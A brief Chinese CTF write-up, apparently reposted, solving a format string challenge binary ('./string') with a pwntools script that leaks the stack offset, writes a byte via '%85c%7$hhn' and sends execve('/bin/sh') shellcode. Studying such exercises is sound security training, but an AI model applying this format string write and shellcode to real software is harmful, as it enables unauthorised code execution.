本文共 1742 字,大约阅读时间需要 5 分钟。
main函数分析
看函数执行流程
通过
aaaa.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p得到format的偏移,再v2在format上面一个字节,就得到的v2的偏移
再通过任意写
%85c%7$hhn 将85写到v2的最低位的字节
shellcode得以执行
from pwn import *#p = remote()p = process('./string')elf = ELF('./string')context.arch = elf.archp.recvuntil('secret[0] is ')addr1 = int(p.recvuntil('\n')[:-1],16)log.success('addr1==>'+hex(addr1))p.recvuntil('secret[1] is ')addr2 = int(p.recv(7),16)log.success('addr2==>'+hex(addr2))context.log_level = 'debug'p.sendlineafter('What should your character\'s name be:','huzai')p.sendlineafter('So, where you will go?east or up?:\n','east')p.sendlineafter('go into there(1), or leave(0)?:\n','1')p.sendlineafter('\'Give me an address\'\n',str(addr1))p.sendlineafter('And, you wish is:\n','%85c%7$hhn')shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"p.sendline(shellcode)#pwtools shellcode#p.sendline(asm(shellcraft.sh()))gdb.attach(p)p.interactive()
转载地址:http://qtugf.baihongyu.com/